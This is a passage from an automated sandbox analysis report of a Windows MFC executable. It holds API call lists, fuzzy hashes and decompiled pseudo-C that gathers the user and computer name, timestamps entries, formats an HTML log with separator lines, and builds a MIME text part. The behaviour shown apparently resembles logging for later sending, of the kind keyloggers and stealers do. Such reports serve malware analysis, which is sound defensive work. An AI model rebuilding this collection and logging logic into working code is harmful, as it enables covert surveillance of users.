    • #800.MFC42(00000000,?,00000000,00000000,?,00000000,?,<P>,</P>,00453C48,<BR>,?,?,?), ref: 00429694
    • #800.MFC42(00000000,?,00000000,00000000,?,00000000,?,<P>,</P>,00453C48,<BR>,?,?,?), ref: 004296A0
    • SysFreeString.OLEAUT32(?), ref: 004296A8
    • #6877.MFC42(00453C48,<BR>,?,?,?,?,?,?,?), ref: 004296C4
    • #926.MFC42(?,<P>,?,00453C48,<BR>,?,?,?,?,?,?,?), ref: 004296D2
    • #924.MFC42(?,00000000,</P>,?,<P>,?,00453C48,<BR>,?,?,?,?,?,?,?), ref: 004296E5
    • #939.MFC42(00000000,?,00000000,</P>,?,<P>,?,00453C48,<BR>,?,?,?,?,?,?,?), ref: 004296F2
    • #800.MFC42(00000000,?,00000000,</P>,?,<P>,?,00453C48,<BR>,?,?,?,?,?,?,?), ref: 004296FE
    • #800.MFC42(00000000,?,00000000,</P>,?,<P>,?,00453C48,<BR>,?,?,?,?,?,?,?), ref: 0042970A
    • #800.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0042975A
    • #800.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00429766
    • #800.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00429772
    • #800.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0042977E
    • #800.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0042978A
    • #800.MFC42(?,?,?,?,?,?,?,00000001,00000000), ref: 004297AC
    • #800.MFC42(?,?,?,?,?,?,?,00000001,00000000), ref: 004297B8
    • #800.MFC42(?,?,?,?,?,?,?,00000001,00000000), ref: 004297C4
    • #800.MFC42(?,?,?,?,?,?,?,00000001,00000000), ref: 004297D0
    • #800.MFC42(?,?,?,?,?,?,?,00000001,00000000), ref: 004297DC
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800$#540$#548#939$#537memset$#2818#539#6877#922BuffCharFreeStringUpper$#4202#858#924#926DateFormatH_prolog
    • String ID: </P>$<BR>$<H1>&nbsp;%s</H1>$<H2>%s, %s</H2><H3>%s</H3>$<P>
    • API String ID: 157677795-3437667793
    • Opcode ID: 00c3331556e37c13ae1a57c4506a8fd5b17bb99e585df87ea54cc74aef307ee2
    • Instruction ID: f09f40e4119619c89d9f0bc648561b01ad262bceca3cf30f729d958ec0790494
    • Opcode Fuzzy Hash: 00c3331556e37c13ae1a57c4506a8fd5b17bb99e585df87ea54cc74aef307ee2
    • Instruction Fuzzy Hash: 95F18D31D00259EADF11EBE1D845BEEBBB8AF19308F50409EE405B7182DB785F49CB69
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 59%
    			E0040F818(intOrPtr* __ecx) {
    				void* _t149;
    				void* _t150;
    				intOrPtr _t152;
    				void* _t155;
    				intOrPtr _t157;
    				void* _t160;
    				intOrPtr _t162;
    				void* _t165;
    				intOrPtr _t167;
    				intOrPtr* _t168;
    				intOrPtr _t169;
    				intOrPtr _t170;
    				intOrPtr _t171;
    				intOrPtr _t176;
    				void* _t177;
    				intOrPtr _t179;
    				void* _t181;
    				void* _t182;
    				intOrPtr _t184;
    				intOrPtr* _t191;
    				signed int _t192;
    				void* _t264;
    				void* _t266;
    				void* _t267;
    
    				E0043E4E0(0x440428, _t264);
    				_t267 = _t266 - 0x2c;
    				_t191 = __ecx;
    				 *(_t264 - 4) =  *(_t264 - 4) & 0x00000000;
    				asm("movsw");
    				asm("movsb");
    				if( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x14)) - 8)) -  *((intOrPtr*)(__ecx + 0x18)) > 1) {
    					L0043DDE4();
    					 *(_t264 - 4) = 1;
    					L0043DDD8();
    					 *(_t264 - 4) = 2;
    					L0043DDCC();
    					 *((intOrPtr*)( *((intOrPtr*)(_t264 - 0x38)) + 0x30))(0, 2,  *((intOrPtr*)(_t264 + 8)), 0xb021, 0);
    					_push(_t264 - 0x24);
    					_t149 =  *((intOrPtr*)( *((intOrPtr*)( *__ecx)) + 0xc))();
    					 *(_t264 - 4) = 3;
    					_push(_t264 - 0x10);
    					_push(_t149);
    					_t150 = _t264 - 0x20;
    					_push(_t150);
    					L0043DE20();
    					_push(_t150);
    					 *(_t264 - 4) = 4;
    					L0043DFCA();
    					 *(_t264 - 4) = 3;
    					L0043DD36();
    					 *(_t264 - 4) = 2;
    					L0043DD36();
    					E00429085( *((intOrPtr*)(_t264 - 0x14)));
    					_t152 =  *((intOrPtr*)(_t264 - 0x14));
    					_push( *((intOrPtr*)(_t152 - 8)));
    					_push(_t152);
    					L0043E28E();
    					_push(_t264 - 0x10);
    					_push(_t191 + 0xc);
    					_t155 = _t264 - 0x24;
    					_push(_t155);
    					L0043DE20();
    					_push(_t155);
    					 *(_t264 - 4) = 5;
    					L0043DFCA();
    					 *(_t264 - 4) = 2;
    					L0043DD36();
    					E00429085( *((intOrPtr*)(_t264 - 0x14)));
    					_t157 =  *((intOrPtr*)(_t264 - 0x14));
    					_push( *((intOrPtr*)(_t157 - 8)));
    					_push(_t157);
    					L0043E28E();
    					_push(_t264 - 0x10);
    					_push(_t191 + 8);
    					_t160 = _t264 - 0x24;
    					_push(_t160);
    					L0043DE20();
    					_push(_t160);
    					 *(_t264 - 4) = 6;
    					L0043DFCA();
    					 *(_t264 - 4) = 2;
    					L0043DD36();
    					E00429085( *((intOrPtr*)(_t264 - 0x14)));
    					_t162 =  *((intOrPtr*)(_t264 - 0x14));
    					_push( *((intOrPtr*)(_t162 - 8)));
    					_push(_t162);
    					L0043E28E();
    					_push(_t264 - 0x10);
    					_push(_t191 + 0x10);
    					_t165 = _t264 - 0x24;
    					_push(_t165);
    					L0043DE20();
    					_push(_t165);
    					 *(_t264 - 4) = 7;
    					L0043DFCA();
    					 *(_t264 - 4) = 2;
    					L0043DD36();
    					E00429085( *((intOrPtr*)(_t264 - 0x14)));
    					_t167 =  *((intOrPtr*)(_t264 - 0x14));
    					_push( *((intOrPtr*)(_t167 - 8)));
    					_push(_t167);
    					L0043E28E();
    					_t168 = _t264 - 0x18;
    					_push(_t168);
    					L0043E162();
    					L0043DDD8();
    					_push(0);
    					 *(_t264 - 4) = 8;
    					L0043E288();
    					_t169 =  *_t168;
    					_push(0);
    					 *((intOrPtr*)(_t264 - 0x24)) = _t169;
    					L0043E288();
    					_t170 =  *((intOrPtr*)(_t169 + 4));
    					_push(0);
    					 *((intOrPtr*)(_t264 - 0x20)) = _t170;
    					L0043E288();
    					_t171 =  *((intOrPtr*)(_t170 + 8));
    					_push(0);
    					 *((intOrPtr*)(_t264 - 0x28)) = _t171;
    					L0043E288();
    					_push(0);
    					L0043E288();
    					_push(0);
    					L0043E288();
    					_push( *((intOrPtr*)(_t264 - 0x24)));
    					_push( *((intOrPtr*)(_t264 - 0x20)));
    					_push( *((intOrPtr*)(_t264 - 0x28)));
    					_push( *((intOrPtr*)(_t171 + 0x14)) + 0x76c);
    					_push( *((intOrPtr*)(_t171 + 0x10)) + 1);
    					_push( *((intOrPtr*)(_t171 + 0xc)));
    					_push("%02d-%02d-%d %02d:%02d:%02d\r\n");
    					_push(_t264 - 0x1c);
    					L0043E174();
    					_push(_t264 - 0x1c);
    					L0043DFCA();
    					E00429085( *((intOrPtr*)(_t264 - 0x14)));
    					_t176 =  *((intOrPtr*)(_t264 - 0x14));
    					_push( *((intOrPtr*)(_t176 - 8)));
    					_push(_t176);
    					L0043E28E();
    					_push( *((intOrPtr*)(_t191 + 0x18)));
    					_t177 = _t264 - 0x28;
    					_push(_t177);
    					L0043DFB2();
    					_push(_t177);
    					 *(_t264 - 4) = 9;
    					L0043DFCA();
    					 *(_t264 - 4) = 8;
    					L0043DD36();
    					E00429085( *((intOrPtr*)(_t264 - 0x14)));
    					_t179 =  *((intOrPtr*)(_t264 - 0x14));
    					_push( *((intOrPtr*)(_t179 - 8)));
    					_push(_t179);
    					L0043E28E();
    					E00429085( *((intOrPtr*)(_t264 - 0x14)));
    					 *(_t267 + 0x20) = L"$#$#$#$#$#$#$#$#$#$#$#$#$#$\r\n";
    					L0043E144();
    					_t181 = _t264 - 0x10;
    					_push(_t181);
    					 *(_t264 - 4) = 0xa;
    					L0043DE26();
    					 *(_t264 - 4) = 0xb;
    					_push(_t264 - 0x20);
    					_push(_t181);
    					_t182 = _t264 - 0x28;
    					_push(_t182);
    					L0043E282();
    					_push(_t182);
    					 *(_t264 - 4) = 0xc;
    					L0043DFCA();
    					 *(_t264 - 4) = 0xb;
    					L0043DD36();
    					 *(_t264 - 4) = 0xa;
    					L0043DD36();
    					 *(_t264 - 4) = 8;
    					L0043DD36();
    					E00429085( *((intOrPtr*)(_t264 - 0x14)));
    					_t184 =  *((intOrPtr*)(_t264 - 0x14));
    					_push( *((intOrPtr*)(_t184 - 8)));
    					_push(_t184);
    					L0043E28E();
    					 *((intOrPtr*)(_t191 + 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(_t191 + 0x14)) - 8));
    					L0043E27C();
    					_push(_t264 - 0x28);
    					L0043E276();
    					 *(_t264 - 4) = 0xd;
    					E0042AAFA( *((intOrPtr*)(_t264 - 0x28)));
    					 *(_t264 - 4) = 8;
    					L0043DD36();
    					 *(_t264 - 4) = 2;
    					L0043DD36();
    					 *(_t264 - 4) = 1;
    					L0043DD36();
    					 *(_t264 - 4) =  *(_t264 - 4) & 0x00000000;
    					L0043DDC0();
    					_t192 = 1;
    				} else {
    					_t192 = 0;
    				}
    				 *(_t264 - 4) =  *(_t264 - 4) | 0xffffffff;
    				L0043DD36();
    				 *[fs:0x0] =  *((intOrPtr*)(_t264 - 0xc));
    				return _t192;
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 0040F81D
    • #354.MFC42(?,?,?), ref: 0040F851
    • #540.MFC42(?,?,?), ref: 0040F85D
    • #5186.MFC42(?,0000B021,00000000,?,?,?), ref: 0040F874
    • #924.MFC42(?,00000000,?,?,?), ref: 0040F89D
    • #858.MFC42(00000000,?,00000000,?,?,?), ref: 0040F8AA
    • #800.MFC42(00000000,?,00000000,?,?,?), ref: 0040F8B6
    • #800.MFC42(00000000,?,00000000,?,?,?), ref: 0040F8C2
    • #6385.MFC42(?,?,00000000,?,00000000,?,?,?), ref: 0040F8DA
    • #924.MFC42(?,?,?,?,?,00000000,?,00000000,?,?,?), ref: 0040F8EB
    • #858.MFC42(00000000,?,?,?,?,?,00000000,?,00000000,?,?,?), ref: 0040F8F8
    • #800.MFC42(00000000,?,?,?,?,?,00000000,?,00000000,?,?,?), ref: 0040F904
    • #6385.MFC42(?,?,00000000,?,?,?,?,?,00000000,?,00000000,?,?,?), ref: 0040F91C
    • #924.MFC42(?,?,?,?,?,00000000,?,?,?,?,?,00000000,?,00000000,?), ref: 0040F92D
    • #858.MFC42(00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000,?,00000000,?), ref: 0040F93A
    • #800.MFC42(00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000,?,00000000,?), ref: 0040F946
    • #6385.MFC42(?,?,00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0040F95E
    • #924.MFC42(?,?,?,?,?,00000000,?,?,?,?,?,00000000,?,?,?,?), ref: 0040F96F
    • #800.MFC42(?,?,?,00000000,?,00000000,?,?,?,?,?,00000000,?,?,?,?), ref: 0040FB78
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800$#924$#6385#858$#354#5186#540H_prolog
    • String ID: %02d-%02d-%d %02d:%02d:%02d$H<E
    • API String ID: 1500017196-2734843972
    • Opcode ID: fcf880664d70c04f9b026bfc0fbd1729dba82b31dae0b5f440ac611373c4f4dc
    • Instruction ID: 252fb8750a8e687878b14574fe1f347268a49ee5709fe182139386791220672e
    • Opcode Fuzzy Hash: fcf880664d70c04f9b026bfc0fbd1729dba82b31dae0b5f440ac611373c4f4dc
    • Instruction Fuzzy Hash: 21C12C72C01149EACF05EBE5D995AEEBBB9AF1D304F10108EF50177192DB386A08CB66
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 61%
    			E00426FF6(void* __ecx, void* __edi, void* __eflags) {
    				void* __ebx;
    				void* __esi;
    				void* _t174;
    				void* _t177;
    				void* _t180;
    				void* _t183;
    				void* _t193;
    				void* _t194;
    				void* _t196;
    				void* _t197;
    				void* _t198;
    				void* _t199;
    				int _t209;
    				void* _t210;
    				void* _t211;
    				void* _t212;
    				void* _t213;
    				void* _t214;
    				void* _t217;
    				intOrPtr* _t220;
    				intOrPtr* _t224;
    				signed int _t259;
    				void* _t297;
    				char _t298;
    				void* _t307;
    				void* _t313;
    				void* _t315;
    				void* _t317;
    
    				E0043E4E0(0x442d35, _t313);
    				E0043E690(0x136c, __ecx);
    				_push(_t307);
    				_push( *((intOrPtr*)(_t313 + 8)));
    				_t174 = E004274E3(_t313 - 0x1378);
    				 *(_t313 - 4) = 0;
    				if( *((intOrPtr*)(_t313 - 0x1374)) != 0) {
    					if( *((intOrPtr*)(_t313 - 0x12ac)) != 0) {
    						L00412BAB(_t174, 0, _t313 - 0x64, _t297, _t307);
    						_push(0);
    						_push( *((intOrPtr*)(_t313 - 0x1278)));
    						 *(_t313 - 4) = 3;
    						_push(_t313 - 0x12de);
    						_push(_t313 - 0x1310);
    						_t177 = _t313 - 0x1374;
    						_push( *((intOrPtr*)(_t313 - 0x1378)));
    						_push(_t177);
    						L00412C8A(_t177, 0, _t313 - 0x64, _t297, _t307);
    						if(_t177 != 0) {
    							L00411E5A(_t177, 0, _t313 - 0x29c, _t297, _t307);
    							_push(_t313 - 0x12ac);
    							 *(_t313 - 4) = 5;
    							L0043DE26();
    							_push(_t313 - 0x10);
    							 *(_t313 - 4) = 6;
    							_t180 = E00410E20(_t313 - 0x18);
    							_push(0);
    							_push(_t180);
    							 *(_t313 - 4) = 7;
    							L00412165(_t180, 0, _t313 - 0x29c, _t297, _t307);
    							 *(_t313 - 4) = 8;
    							L0043DD36();
    							 *(_t313 - 4) = 6;
    							L0043DD36();
    							 *(_t313 - 4) = 5;
    							L0043DD36();
    							_push(_t313 - 0x12ac);
    							L0043DE26();
    							_push(_t313 - 0x10);
    							 *(_t313 - 4) = 9;
    							_t183 = E00410E20(_t313 - 0x18);
    							 *(_t313 - 4) = 0xa;
    							E00410E56(_t313 - 0x298, _t183);
    							 *(_t313 - 4) = 0xb;
    							L0043DD36();
    							 *(_t313 - 4) = 9;
    							L0043DD36();
    							 *(_t313 - 4) = 5;
    							L0043DD36();
    							_push(_t313 - 0x34);
    							L0043E162();
    							_push(_t313 - 0x48);
    							L0043E4A4();
    							 *(_t313 - 0xcc) = 0;
    							GetTimeFormatA(0x400, 2, _t313 - 0x48, 0, _t313 - 0xcc, 0x32);
    							 *(_t313 - 0x98) = 0;
    							GetDateFormatA(0x400, 0, _t313 - 0x48, 0, _t313 - 0x98, 0x32);
    							_t193 = _t313 - 0xcc;
    							_push(_t193);
    							L0043DE26();
    							_t194 = _t313 - 0x98;
    							_push(_t194);
    							 *(_t313 - 4) = 0xc;
    							L0043DE26();
    							 *(_t313 - 4) = 0xd;
    							_t196 = E00429029(_t313 - 0x1c, 0xe059);
    							_push(_t194);
    							_push(_t196);
    							_t197 = _t313 - 0x30;
    							 *(_t313 - 4) = 0xe;
    							_push(_t197);
    							L0043E282();
    							_push(", ");
    							_push(_t197);
    							_t198 = _t313 - 0x24;
    							 *(_t313 - 4) = 0xf;
    							_push(_t198);
    							L0043DE20();
    							_push(_t193);
    							_push(_t198);
    							_t199 = _t313 - 0x10;
    							 *(_t313 - 4) = 0x10;
    							_push(_t199);
    							L0043E282();
    							_push(_t199);
    							 *(_t313 - 4) = 0x11;
    							L0043DFCA();
    							 *(_t313 - 4) = 0x10;
    							L0043DD36();
    							 *(_t313 - 4) = 0xf;
    							L0043DD36();
    							 *(_t313 - 4) = 0xe;
    							L0043DD36();
    							 *(_t313 - 4) = 0xd;
    							L0043DD36();
    							 *(_t313 - 4) = 0xc;
    							L0043DD36();
    							 *(_t313 - 4) = 5;
    							L0043DD36();
    							_t298 =  *0x4550cc; // 0x0
    							_t259 = 0x1f;
    							 *(_t313 - 0x1cc) = _t298;
    							memset(_t313 - 0x1cb, 0, _t259 << 2);
    							asm("stosw");
    							asm("stosb");
    							_push(0x1f);
    							 *(_t313 - 0x14c) = _t298;
    							memset(_t313 - 0x14b, 0, 0 << 2);
    							_t317 = _t315 + 0x18;
    							asm("stosw");
    							asm("stosb");
    							 *(_t313 - 0x2c) = 0x80;
    							GetUserNameA(_t313 - 0x1cc, _t313 - 0x2c);
    							 *(_t313 - 0x2c) = 0x80;
    							_t209 = GetComputerNameA(_t313 - 0x14c, _t313 - 0x2c);
    							_push(1);
    							_pop(0);
    							_push(0x80);
    							_push(0x29);
    							L0043E34E();
    							_push(0x80);
    							_push(0x5c);
    							 *(_t313 - 4) = 0x12;
    							L0043E34E();
    							 *(_t313 - 0x28) = _t209;
    							_t210 = _t313 - 0x14c;
    							_push(_t210);
    							 *(_t313 - 4) = 0x13;
    							L0043DE26();
    							_push(_t210);
    							_t211 = _t313 - 0x24;
    							_push(0x453480);
    							_push(_t211);
    							 *(_t313 - 4) = 0x14;
    							L0043E168();
    							_push( *(_t313 - 0x28));
    							 *(_t313 - 4) = 0x15;
    							_push(_t211);
    							_t212 = _t313 - 0x30;
    							_push(_t212);
    							L0043E282();
    							 *(_t313 - 4) = 0x16;
    							_push(_t313 - 0x1cc);
    							_push(_t212);
    							_t213 = _t313 - 0x1c;
    							_push(_t213);
    							L0043DE20();
    							_push(_t209);
    							_push(_t213);
    							_t214 = _t313 - 0x20;
    							 *(_t313 - 4) = 0x17;
    							_push(_t214);
    							L0043E282();
    							_push(_t214);
    							 *(_t313 - 4) = 0x18;
    							L0043DE1A();
    							 *(_t313 - 4) = 0x17;
    							L0043DD36();
    							 *(_t313 - 4) = 0x16;
    							L0043DD36();
    							 *(_t313 - 4) = 0x15;
    							L0043DD36();
    							 *(_t313 - 4) = 0x14;
    							L0043DD36();
    							 *(_t313 - 4) = 0x13;
    							L0043DD36();
    							 *(_t313 - 4) = 0x12;
    							L0043DD36();
    							 *(_t313 - 4) = 5;
    							L0043DD36();
    							E00410EF3(_t313 - 0x2fc);
    							 *(_t313 - 4) = 0x19;
    							L0043DDD8();
    							 *(_t313 - 4) = 0x1a;
    							if( *((intOrPtr*)(_t313 - 0x308)) == 0) {
    								_t224 = E00429029(_t313 - 0x14, 0xe05a);
    								_push( *((intOrPtr*)(_t313 - 0x300)));
    								 *(_t313 - 4) = 0x1b;
    								_push(_t313 - 0x14c);
    								_push(_t313 - 0x1cc);
    								_push( *((intOrPtr*)(_t313 - 0x304)));
    								_push( *_t224);
    								_push(_t313 + 8);
    								L0043E174();
    								_t317 = _t317 + 0x18;
    								 *(_t313 - 4) = 0x1a;
    								L0043DD36();
    							}
    							if( *((intOrPtr*)(_t313 - 0x308)) == 0) {
    								_t220 = E00429029(_t313 - 0x14, 0xe05f);
    								_push(_t313 - 0x14c);
    								_push(_t313 - 0x1cc);
    								 *(_t313 - 4) = 0x1c;
    								_push( *((intOrPtr*)(_t313 - 0x304)));
    								_push( *((intOrPtr*)(_t313 - 0x300)));
    								_push( *_t220);
    								_push(_t313 + 8);
    								L0043E174();
    								 *(_t313 - 4) = 0x1a;
    								L0043DD36();
    							}
    							_push(_t313 + 8);
    							L004128F9(_t313 + 8, 0, _t313 - 0x29c, _t298, 0);
    							_t217 = _t313 - 0x29c;
    							_push(_t313 - 0x29c);
    							L00412FF7(_t313 - 0x29c, 0, _t313 - 0x64, _t298, 0);
    							 *(_t313 - 4) = 0x19;
    							L0043DD36();
    							 *(_t313 - 4) = 5;
    							L004110CC(_t313 - 0x29c, 0, _t313 - 0x2fc, _t298, 0);
    							 *(_t313 - 4) = 3;
    							L00411F64(_t217, 0, _t313 - 0x29c, _t298, 0);
    							 *(_t313 - 4) = 0;
    							L00412C30(_t217, 0, _t313 - 0x64, _t298, 0);
    							 *(_t313 - 4) = 0x1d;
    						} else {
    							 *(_t313 - 4) = 0;
    							L00412C30(_t177, 0, _t313 - 0x64, _t297, _t307);
    							 *(_t313 - 4) = 4;
    							goto L2;
    						}
    					} else {
    						 *(_t313 - 4) = 2;
    						goto L2;
    					}
    				} else {
    					 *(_t313 - 4) = 1;
    					L2:
    				}
    				L0043DD36();
    				 *(_t313 - 4) =  *(_t313 - 4) | 0xffffffff;
    				L0043DD36();
    				 *[fs:0x0] =  *((intOrPtr*)(_t313 - 0xc));
    				return 0;
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 00426FFB
      • Part of subcall function 004274E3: __EH_prolog.LIBCMT ref: 004274E8
      • Part of subcall function 004274E3: #535.MFC42(?,?,?,?,?,0042701A,?), ref: 00427517
      • Part of subcall function 004274E3: #535.MFC42(?,?,?,?,?,?,0042701A,?), ref: 0042752D
    • #537.MFC42(?), ref: 004270AE
    • #800.MFC42 ref: 004270DB
    • #800.MFC42 ref: 004270E7
    • #800.MFC42 ref: 004270F3
    • #537.MFC42(?), ref: 00427102
    • #800.MFC42(00000000,?), ref: 0042712E
    • #800.MFC42(00000000,?), ref: 0042713A
    • #800.MFC42(00000000,?), ref: 00427146
    • #3811.MFC42(?,00000000,?), ref: 0042714F
    • #6673.MFC42(?,?,00000000,?), ref: 0042715B
    • GetTimeFormatA.KERNEL32(00000400,00000002,?,00000000,?,00000032,?,?,00000000,?), ref: 0042717C
    • GetDateFormatA.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00427198
    • #537.MFC42(?), ref: 004271A8
    • #537.MFC42(?,?), ref: 004271BD
    • #922.MFC42(?,00000000,00000000,?,?), ref: 004271E2
    • #924.MFC42(?,00000000,00454BAC,?,00000000,00000000,?,?), ref: 004271F5
    • #922.MFC42(?,00000000,00000000,?,00000000,00454BAC,?,00000000,00000000,?,?), ref: 00427204
    • #858.MFC42(00000000,?,00000000,00000000,?,00000000,00454BAC,?,00000000,00000000,?,?), ref: 00427214
    • #800.MFC42(00000000,?,00000000,00000000,?,00000000,00454BAC,?,00000000,00000000,?,?), ref: 00427220
    • #800.MFC42(00000000,?,00000000,00000000,?,00000000,00454BAC,?,00000000,00000000,?,?), ref: 0042722C
    • #800.MFC42(00000000,?,00000000,00000000,?,00000000,00454BAC,?,00000000,00000000,?,?), ref: 00427238
    • #800.MFC42(00000000,?,00000000,00000000,?,00000000,00454BAC,?,00000000,00000000,?,?), ref: 00427244
    • #800.MFC42(00000000,?,00000000,00000000,?,00000000,00454BAC,?,00000000,00000000,?,?), ref: 00427250
    • #800.MFC42(00000000,?,00000000,00000000,?,00000000,00454BAC,?,00000000,00000000,?,?), ref: 0042725C
    • GetUserNameA.ADVAPI32(?,?), ref: 004272A6
    • GetComputerNameA.KERNEL32 ref: 004272BA
    • #536.MFC42(00000029,00000001), ref: 004272C9
    • #536.MFC42(0000005C,00000001,00000029,00000001), ref: 004272DA
    • #537.MFC42(?,0000005C,00000001,00000029,00000001), ref: 004272F0
    • #926.MFC42(?,00453480,00000000,?,0000005C,00000001,00000029,00000001), ref: 00427303
    • #922.MFC42(?,00000000,?,?,00453480,00000000,?,0000005C,00000001,00000029,00000001), ref: 00427314
    • #924.MFC42(?,00000000,?,?,00000000,?,?,00453480,00000000,?,0000005C,00000001,00000029,00000001), ref: 00427329
    • #922.MFC42(?,00000000,00000000,?,00000000,?,?,00000000,?,?,00453480,00000000,?,0000005C,00000001,00000029), ref: 00427338
    • #939.MFC42(00000000,?,00000000,00000000,?,00000000,?,?,00000000,?,?,00453480,00000000,?,0000005C,00000001), ref: 00427348
    • #800.MFC42(00000000,?,00000000,00000000,?,00000000,?,?,00000000,?,?,00453480,00000000,?,0000005C,00000001), ref: 00427354
    • #800.MFC42(00000000,?,00000000,00000000,?,00000000,?,?,00000000,?,?,00453480,00000000,?,0000005C,00000001), ref: 00427360
    • #800.MFC42(00000000,?,00000000,00000000,?,00000000,?,?,00000000,?,?,00453480,00000000,?,0000005C,00000001), ref: 0042736C
    • #800.MFC42(00000000,?,00000000,00000000,?,00000000,?,?,00000000,?,?,00453480,00000000,?,0000005C,00000001), ref: 00427378
    • #800.MFC42(00000000,?,00000000,00000000,?,00000000,?,?,00000000,?,?,00453480,00000000,?,0000005C,00000001), ref: 00427384
    • #800.MFC42(00000000,?,00000000,00000000,?,00000000,?,?,00000000,?,?,00453480,00000000,?,0000005C,00000001), ref: 00427390
    • #800.MFC42(00000000,?,00000000,00000000,?,00000000,?,?,00000000,?,?,00453480,00000000,?,0000005C,00000001), ref: 0042739C
      • Part of subcall function 00410EF3: __EH_prolog.LIBCMT ref: 00410EF8
      • Part of subcall function 00410EF3: #540.MFC42 ref: 00410F0B
      • Part of subcall function 00410EF3: #540.MFC42 ref: 00410F18
      • Part of subcall function 00410EF3: #537.MFC42(text/plain), ref: 00410F29
      • Part of subcall function 00410EF3: #537.MFC42(iso-8859-1,text/plain), ref: 00410F3A
      • Part of subcall function 00410EF3: #540.MFC42(iso-8859-1,text/plain), ref: 00410F46
      • Part of subcall function 00410EF3: #540.MFC42(iso-8859-1,text/plain), ref: 00410F52
      • Part of subcall function 00410EF3: #540.MFC42(iso-8859-1,text/plain), ref: 00410F5E
      • Part of subcall function 00410EF3: #540.MFC42(iso-8859-1,text/plain), ref: 00410F6A
      • Part of subcall function 00410EF3: #540.MFC42 ref: 00410F9A
      • Part of subcall function 00410EF3: UuidCreate.RPCRT4 ref: 00410FB4
      • Part of subcall function 00410EF3: UuidToStringA.RPCRT4(?,?), ref: 00410FC5
      • Part of subcall function 00410EF3: #860.MFC42(?,?,?,?,?,?,?,?), ref: 00410FD0
      • Part of subcall function 00410EF3: RpcStringFreeA.RPCRT4(?), ref: 00410FD9
    • #540.MFC42(00000000,?,00000000,00000000,?,00000000,?,?,00000000,?,?,00453480,00000000,?,0000005C,00000001), ref: 004273B3
    • #2818.MFC42(?,?,?,?,?,?,?,00000000,00000000,?,00000000,?,?,00000000,?,?), ref: 004273FA
    • #800.MFC42 ref: 00427409
    • #2818.MFC42(?,?,?,?,?,?,?,00000000,00000000,?,00000000,?,?,00000000,?,?), ref: 0042744B
    • #800.MFC42 ref: 0042745A
    • #800.MFC42 ref: 00427484
      • Part of subcall function 00429029: #1168.MFC42(00000002), ref: 00429052
      • Part of subcall function 00429029: LoadStringA.USER32 ref: 0042906A
      • Part of subcall function 00429029: #537.MFC42(00000001), ref: 0042907A
    • #800.MFC42 ref: 004274BF
    • #800.MFC42 ref: 004274CE
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800$#537#540$#922$H_prologString$#2818#535#536#924FormatNameUuid$#1168#3811#6673#858#860#926#939ComputerCreateDateFreeLoadTimeUser
    • String ID: 5-D
    • API String ID: 2983505076-2356814095
    • Opcode ID: 443957831526f93c60cbc5b9592fc5e517bf6ae7b6713f599016f16c159e9bf0
    • Instruction ID: 7f0afa281f7a9448ea938780668a47e9d00c9a4003bbe7e2d1c4d2ad1e05b918
    • Opcode Fuzzy Hash: 443957831526f93c60cbc5b9592fc5e517bf6ae7b6713f599016f16c159e9bf0
    • Instruction Fuzzy Hash: 7EE18C71C0129DEADF15EBA5C945BDEBBB8AF29308F10449EE105B3182DB781B48DB25
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • #537.MFC42 ref: 00424003
    • #5683.MFC42(0000005C), ref: 00424011
    • #4277.MFC42(?,00000001,0000005C), ref: 0042401F
    • #858.MFC42(00000000,?,00000001,0000005C), ref: 0042402C
    • #800.MFC42(00000000,?,00000001,0000005C), ref: 00424038
    • #800.MFC42 ref: 00424058
    • #3790.MFC42(?,?), ref: 004240A7
